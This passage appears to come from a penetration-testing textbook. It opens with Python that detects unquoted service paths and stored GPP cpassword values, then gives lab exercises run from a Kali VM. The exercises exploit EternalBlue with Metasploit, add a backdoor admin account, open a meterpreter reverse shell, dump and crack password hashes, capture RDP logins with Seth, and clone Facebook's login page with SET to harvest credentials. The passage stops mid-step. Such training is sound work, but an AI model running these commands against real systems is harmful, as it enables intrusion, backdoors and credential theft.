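    "GoodSvc": r'"C:\Program Files\Good Vendor\goodsvc.exe" -run',
    "VendorUpdater": r'C:\Program Files\Vendor App\updater.exe -k svc',
    "Spooler": r'C:\Windows\System32\spoolsv.exe',
}

# Constructed Group Policy Preferences Groups.xml: one user entry still carrying a
# cpassword value (placeholder ciphertext) and one entry with no stored password.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="EXAMPLE_CIPHERTEXT_PLACEHOLDER" userName="LocalAdmin"/>
  </User>
  <User name="Helpdesk">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="" userName="Helpdesk"/>
  </User>
</Groups>
"""

_EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def executable_part(image_path: str) -> str:
    """Return the executable portion of an unquoted ImagePath, i.e. everything up
    to and including the first '.exe'; service arguments such as '-k svc' follow it."""
    m = _EXE_RE.search(image_path)
    return image_path[: m.end()] if m else image_path


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not wrapped in quotes and its executable portion
    contains a space, which is the condition the book describes."""
    p = image_path.strip()
    if not p or p.startswith('"'):
        return False
    return " " in executable_part(p)


def quote_service_path(image_path: str) -> str:
    """Return the corrected ImagePath with the executable portion quoted."""
    p = image_path.strip()
    exe = executable_part(p)
    return f'"{exe}"{p[len(exe):]}'


def find_unquoted_service_paths(services: dict) -> dict:
    """Map each vulnerable service name to the quoted path it should be given."""
    return {
        name: quote_service_path(path)
        for name, path in services.items()
        if is_unquoted_with_spaces(path)
    }


def find_gpp_cpassword(xml_text: str, source: str = "Groups.xml") -> list:
    """Return (source, element tag, userName) for every element whose cpassword
    attribute is non-empty, i.e. a preference item still carrying a stored password."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.attrib.get("cpassword"):
            hits.append((source, elem.tag, elem.attrib.get("userName", "")))
    return hits


if __name__ == "__main__":
    for name, fixed in find_unquoted_service_paths(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces; set binpath= {fixed}")
    for source, tag, user in find_gpp_cpassword(SAMPLE_GROUPS_XML):
        print(f"{source}: <{tag}> for user {user!r} still stores a cpassword")
```

A flagged service is fixed with the same sc config binpath= command shown under Writable services, passing the quoted path that quote_service_path() returns. A cpassword hit means the preference item should be removed from Sysvol and the account's password changed, because the stored value can be recovered as the book describes.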
Lab Exercises

In these exercises, you experiment with some of the exploit techniques discussed in this chapter. Remember that all exercises should be performed in a test lab environment and not on your production network.

You will need the Kali Linux VM, the Win7A VM, and the Server 2012 VM. Record the IP address of each VM below:

Kali: _____________________________
Win7A: ___________________________
Server 2012: _______________________

Exercise 5-1: Exploit an SMB service with Metasploit

In this exercise, you exploit the SMB service running on the Win7A VM and then create a user account that you could use as a backdoor to the system even after the system is patched. Remember that these exercises should be run on lab computers and not on production systems.

1. Ensure you have the Kali Linux VM, Win7A VM, and the Server 2012 VM running.
2. Launch a terminal prompt on the Kali Linux VM.
3. Type msfconsole to start using Metasploit. Because you performed a vulnerability scan on the Win7A VM in the last chapter, you know that the Win7A system is vulnerable to the EternalBlue exploit.
4. To search for the EternalBlue exploit, type search EternalBlue.
5. To locate the exploit by the Microsoft security bulletin ID, type search MS17-010.
6. To exploit the Windows 7 VM, run the following command to select the EternalBlue exploit:
use exploit/windows/smb/ms17_010_eternalblue
7. To see what options need to be configured, run the following command (you are looking for mandatory options):
show options
Note that the remote host option (RHOST) is the only mandatory option.
8. To set the remote host to the IP address of your Windows 7 VM, run the following command:
set RHOST <IP address of the Win7A VM>
9. To verify that your change has taken effect, run the show options command again.
10. Type exploit to run the exploit and attack the Windows system. After a few seconds you should see WIN!, indicating that you were successful in compromising the system.
Note that you are now at a Windows command prompt.

11. To show that you have full administrator capabilities, create an administrative account on the target system with the following commands:
net user lab51hacked Pa$$w0rd /add
net localgroup administrators lab51hacked /add
12. To verify that the user account was created, type net user again.
13. Press CTRL+C to exit out of the exploit.
14. Close all windows in Kali Linux, but leave the VMs running for the next exercise.

Exercise 5-2: Use the meterpreter exploit payload

In this exercise, you exploit the SMB service running on the Win7A VM with the meterpreter payload. After exploiting the system, you obtain a list of the password hashes and then crack them with John the Ripper. Remember that these exercises should be run on lab computers and not on production systems.

1. Ensure you have the Kali Linux VM, Win7A VM, and the Server 2012 VM running.
2. Launch a terminal prompt on the Kali Linux VM.
3. Type msfconsole to start using Metasploit.
4. To exploit the Windows 7 VM, run the following command:
use exploit/windows/smb/ms17_010_eternalblue
5. To see what options need to be configured, run the following command (you are looking for mandatory options):
show options
Note that the remote host option (RHOST) is the only mandatory option.
6. To set the remote host to the IP address of your Windows 7 VM, run the following command:
set RHOST <IP address of the Win7A VM>
7. To verify that your change has taken effect, run the show options command again.
8. To change the payload so that a meterpreter shell is obtained, run the following commands:
set payload windows/x64/meterpreter/reverse_tcp
show options
Do you see that the LHOST payload option is now required?
9. Run the following command to set the LHOST option:
set LHOST <IP address of the Kali Linux VM>
10. Type exploit to run the exploit and attack the Windows system. After a few seconds you should see the meterpreter> prompt. At this point you can use any of the meterpreter commands.
You learn more about the meterpreter commands in Chapter 8, but let's try a few of them out.

11. In the meterpreter session, type sysinfo to view information about the system you have exploited, and note the computer name.
12. To retrieve the password hashes from the compromised Windows system, run the following command:
run post/windows/gather/hashdump
13. To copy the password hashes, select all of the output from the hashdump command, right-click the highlighted area, and choose Copy.
14. Select Applications ➪ Usual Applications ➪ Accessories ➪ Text Editor.
15. Paste the copied usernames and password hashes into the text editor.
16. Save the file as Lab52_PasswordHashes.
17. Launch a new terminal and run the following command to use John the Ripper to crack the password hashes:
john --format=NT Lab52_PasswordHashes
Within a short time, the password hashes should be cracked. Figure 5-20 shows a sample hash file and the password hashes being cracked. Note that the usernames are on the right in brackets and the cracked passwords are on the left. For example, I have a user named user1 that has a password of house.

FIGURE 5-20: Cracking Windows passwords with John the Ripper.

18. Close all windows in Kali Linux.

Exercise 5-3: Conduct a MiTM attack with SETH

In this exercise, you download and use SETH to capture remote desktop logon credentials. Remember that these exercises should be run on lab computers and not on production systems.

1. Launch a terminal in Kali Linux.
2. Run the following commands to download SETH and then change to the downloaded folder:
git clone https://github.com/SySS-Research/Seth.git
cd Seth
3. Run the following command to execute SETH:
./seth.sh eth0
4. With SETH running, switch over to the Win7A VM.
5. Click the Start button, type mstsc, and press Enter to launch the remote desktop client.
6. In the remote desktop client, type the IP address of the Windows Server and choose Connect.
It may take a minute, but it should ask you for credentials.
7. Type the username administrator and the password Pa$$w0rd, and finish connecting.
8. Switch over to Kali Linux and scroll up to review the information in the SETH output. Do you see the username and password?
9. Close all windows in Kali Linux.

Exercise 5-4: Use SET for credential harvesting

In this exercise, you use the Social-Engineer Toolkit (SET) to capture Facebook logon credentials. Remember that these exercises should be run on lab computers and not on production systems.

Phase 1: Set up the cloned site

1. Launch a new terminal on your Kali Linux system.
2. In the terminal session, run the setoolkit command to launch SET.
3. Choose y to agree to the terms of use and go to the SET main terminal screen.
4. Type 1 to perform a social engineering attack and press Enter.
5. Type 2 for Website Attack Vectors and press Enter.
6. Type 3 to perform a credential harvester attack and then press Enter.
7. Type 2 to choose Site Cloner and press Enter.
8. Type the IP address of your Kali Linux system and press Enter. You are then asked which website to clone.
9. Type https://www.facebook.com. The Facebook login page is copied to your Kali system and set up to listen on port 80.
10. To test the site, launch a browser and type http://<IP address of the Kali Linux VM>. You should see what appears to be the Facebook site.

Phase 2: Trick the victim into visiting the fake site

11. While SET is running on Kali Linux, go to the Win7A VM.
12. Launch a browser and type http://<IP address of the Kali Linux VM>. The Facebook logon page should appear.
13. Try to log on with the following credentials:
Username: [email protected]
Password: Pa$$w0rd

Phase 3: Check the harvester file for passwords

As users attempt to log on to the fake Facebook site, SET logs the usernames and passwords. You can have a report generated by following these steps:

14. Switch back to the terminal running SET.
You should see that some activity was generated in SET.
15. Press CTRL+C to generate a report. Note that the reports are stored in the /root/.set/reports folder. There is an HTML report and an XML report.
16. To check out the HTML report, click the folder icon in the Kali toolbar and then choose Home on the left.
17. Note that by default Kali does not show hidden folders, so choose the Options button to the left of the minimize button in the folder window.
18. Choose the Show Hidden Files check box at the bottom. Now you can see the .set folder.
19. Naviga